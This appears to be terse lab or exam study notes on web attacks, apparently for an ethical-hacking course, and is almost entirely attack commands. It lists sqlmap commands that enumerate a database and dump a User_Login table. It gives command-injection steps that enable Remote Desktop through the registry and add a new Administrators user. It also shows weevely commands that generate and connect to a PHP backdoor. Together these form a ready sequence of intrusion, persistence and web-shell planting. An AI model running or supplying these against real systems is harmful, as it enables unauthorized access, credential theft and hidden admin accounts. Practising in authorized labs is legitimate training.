02_web_attack

目標: DB,Table,Column,flag 藏在 data 裡面

SQLi type

Detect

id=4-3

SQL Injection

sqlmap -u <url> --cookie="user=12343"
sqlmap -r r.txt
sqlmap -r r.txt --dbs
sqlmap -r r.txt -D moveiscope --tables
sqlmap -r r.txt -D moveiscope -T User_Login --columns
sqlmap -r r.txt -D moveiscope -T User_Login --columns --technique=B
sqlmap -r r.txt -D moveiscope -T User_Login --dump --technique=B
The list of techniques with its letters is as follows:

B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

Command Injection

netstat -an | findstr :3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user cehp /add
net users
 net localgroup Administrators cehp /add
net localgroup Administrators

Upload File

weevely generate cehp backdoor.php
weevely <url> cehp